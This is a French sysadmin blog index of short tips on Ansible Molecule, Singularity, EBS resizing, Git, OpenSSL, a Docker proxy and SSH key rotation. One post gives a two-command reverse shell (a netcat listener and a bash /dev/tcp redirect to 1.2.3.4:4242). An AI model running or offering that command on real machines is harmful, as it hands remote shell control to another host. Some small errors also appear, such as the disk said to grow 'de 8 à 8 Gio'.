Maje informatique » Blog technique

Linux Pratique n°128 – Testez vos rôles Ansible avec Molecule

Maje Informatique — Wed, 19 Jan 2022 06:59:38 +0000

Voilà bien un outil pratique qui permet de tester vos rôles Ansible ! Ansible a pris tellement d’importance qu’il est indispensable de s’assurer de la validité et de l’idempotence des rôles. Molecule vous aide à tester vos rôles en enchainant des étapes pénibles comme la création de l’environnement de test, l’application des rôles, la vérification des résultats (que vous pouvez aussi exprimer à l’aide de Playbooks !), puis le test d’idempotence et enfin le grand nettoyage !

Linux Pratique n°128 – Les Containers avec Singularity

Maje Informatique — Wed, 19 Jan 2022 06:54:31 +0000

Cet article décrit la solution de containerisation Singularity qui propose une solution adapteé à l’usage des containers principalement sur les clusters de calcul (HPC). Par opposition à Docker, aucun démon n’est nécessaire, aucun privilège « root » n’est requis…

Linux Mag n°248 – Comment interfacer Nagios et Grafana !

Maje Informatique — Sun, 25 Apr 2021 19:05:56 +0000

Cet article propose une solution simple, à base de scripts Python, pour faire afficher les alertes de Nagios dans un tableau de Grafana.

Retailler un disque EBS

Maje Informatique — Tue, 05 Jan 2021 08:55:16 +0000

Une fois la taille du disque EBS augmentée, la commande lsblk doit refléter cette augmentation. Ici le disque /dev/nvme0n1 est passé de 8 à 8 Gio:

$ lsblk
NAME          MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
nvme0n1       259:0    0   9G  0 disk
├─nvme0n1p1   259:1    0   8G  0 part /
└─nvme0n1p128 259:2    0   1M  0 part

Dans notre cas, il s’agit d’augmenter la taille d’une partition. Si ce n’est pas le cas et qu’il s’agit d’augmenter la taille d’un système de fichiers situé sur un disque, utilisez directement la commande de retaillage du type de système de fichiers (resize2fs ou xfs_growfs).

Attention, la commande suivante a besoin de créer des fichiers temporaires, il faut donc de l’espace sous /tmp. Pour cela, créez un système de fichiers de type tmpfs :

$ sudo mount -o size=10M,rw,nodev,nosuid -t tmpfs tmpfs /tmp

Pour augmenter la taille de la partition :

$ sudo growpart /dev/nvme0n1 1

Pour retailler le système de fichiers (ici, de type XFS) :

$ sudo xfs_growfs -d /

Créer un « reverse-shell » en 2 commandes

Maje Informatique — Thu, 31 Dec 2020 08:37:35 +0000

Sur votre machine locale qui est votre machine de contrôle, vous lancez un serveur TCP à l’écoute du port souhaité :

$ nc -lvp 4242

(on suppose que l’adresse IP de cette machine est 1.2.3.4)

Sur la machine distante, sur laquelle vous souhaitez exécuter un « reverse-shell », vous lancez la commande suivante :

# bash -c "sh - i >&/dev/tcp/1.2.3.4/4242 0>&1"

…et le tour est joué !

Obtenir la taille des bases MySQL/MariaDB

Maje Informatique — Thu, 26 Nov 2020 17:13:53 +0000

SELECT
	COUNT(*) AS Total_Table_Count
	,table_schema
	,CONCAT(ROUND(SUM(table_rows)/1000000,2),'M') AS Total_Row_Count
	,CONCAT(ROUND(SUM(data_length)/(1024*1024*1024),2),'G') AS Total_Table_Size
	,CONCAT(ROUND(SUM(index_length)/(1024*1024*1024),2),'G') AS Total_Table_Index
	,CONCAT(ROUND(SUM(data_length+index_length)/(1024*1024*1024),2),'G') Total_Size
FROM information_schema.TABLES
GROUP BY table_schema
ORDER BY SUM(data_length+index_length);

Mettre à jour un fichier .gitignore

Maje Informatique — Tue, 04 Feb 2020 13:24:31 +0000

Vous disposez d’un dépôt GIT qui contient déjà des fichiers ainsi qu’un fichier .gitignore. Vous modifiez maintenant votre fichier .gitignore pour « ignorer » de nouveaux fichiers mais qui ont déjà été enregistrés dans le dépôt : comment les faire « disparaître » ?

« commitez » toutes vos modifications actuelles, y compris votre fichier .gitignore
nettoyez votre cache local ainsi :
```
git rm -r --cached .
```
1. rm est le « remove »
2. -r sera récursif
3. --cached ne supprimera les fichiers que de l’index
4. . indique que tous les fichiers seront marqués « untracked » (car pour « untracker » un fichier il faut faire un git rm --cached foo.txt)
ajoutez à nouveau tous les fichiers à GIT :
```
git add .
```
enregistrez la modification de .gitignore :
```
git commit -m ".gitignore fix"
```
puis faites le « push »

(source : http://www.codeblocq.com/2016/01/Untrack-files-already-added-to-git-repository-based-on-gitignore/)

(Re)générer rapidement un certificat auto-signé

Maje Informatique — Tue, 03 Sep 2019 13:34:16 +0000

$ openssl genrsa -out service.key 2048
$ openssl req -new -key service.key -out service.csr
$ openssl x509 -req -days 365 -in service.csr -signkey service.key -out service.crt

Recopiez le fichier *.crt et le fichier *.key « aux bons endroits » et voilà !

Attention, lors de la 2ème étape vous devrez donner le nom du serveur : indiquez bien le nom attendu par l’application cliente, sinon utilisez les extensions (voir le fichier openssl.cnf) qui permettent d’ajouter des subjectAltName.

Configurer un proxy pour le démon dockerd

Maje Informatique — Tue, 03 Sep 2019 13:25:04 +0000

Si le démon dockerd possède 3 variables d’environnement pour sa configuration de proxy (HTTP_PROXY, HTTPS_PROXY et NOPROXY), l’accès à une Registry externe (celle du Hub de Docker par exemple) se fait forcément en HTTPS… et c’est là que les petits problèmes commencent…

Pour configurer les variables d’environnement avec un démon géré par systemd, créez le répertoire /etc/systemd/system/docker.service.d puis ajoutez le fichier proxy.conf contenant la définition des variables d’environnement. Par exemple :

[Service]
Environment="HTTP_PROXY=http://mon_proxy:3128"
Environment="HTTPS_PROXY=http://mon_proxy:3129"
Environment="NO_PROXY=localhost,127.0.0.1,172.17.0.1,172.30.1.1"

Puis exécutez les commandes suivantes :

# systemctl dameon-reload
# systemctl restart docker

et un petit test….

$ docker search ubuntu

Attention :

si votre proxy utilise un certificat auto-signé, vous devrez rajouter l’option suivante dans la configuration du démon

--insecure-registry proxy:port

si votre proxy utilise un certificat signé par une CA, exécutez les commandes suivantes :

$ sudo cp mon_cert.crt /etc/pki/ca-trust/source/anchors

$ sudo update-ca-trust extract

Effectuer la rotation des clés des serveurs SSHD en douceur

Maje Informatique — Sat, 02 Jun 2018 16:14:27 +0000

Depuis la version 6.8 de OpenSSH (disponible à partir de la RHEL/CentOS 7.4), il est possible d’effectuer des rotations des clés de serveurs pour le service SSH, tout en douceur pour l’utilisateur.

Quel est le problème ?

Vous savez bien que lors d’un changement de clés côté serveur, le client va devoir valider l’empreinte de la nouvelle clé, ce qui risque de surprendre l’utilisateur consciencieux qui va se croire victime d’une attaque Mitm !

Avec la nouvelle version de OpenSSH, plus de risque d’apeurer vos utilisateurs ou clients.

La solution :

générez vos nouvelles clés sous /etc/ssh/, avec l’algorithme ecdsa sur 521 bits par exemple:
```
# ssh-keygen -t ecdsa -b 521
```
ajoutez les nouvelles directives HostKey après celles qui existent déjà
demandez aux utilisateurs d’ajouter l’option « UpdateHostKeys yes » (ou « ask ») dans la configuration de leur client SSH ou bien d’ajouter cette option. Par exemple:
```
$ ssh -o UpdateHostKeys=ask serveur
```
lors de la connexion au serveur, le client SSH va aspirer toutes les clés du serveurs et mettre le fichier known_hosts à jour
après un « certain temps », estimant que tous les utilisateurs ont aspiré les nouvelles clés, il ne reste plus qu’à l’administrateur qu’à supprimer les anciennes clés !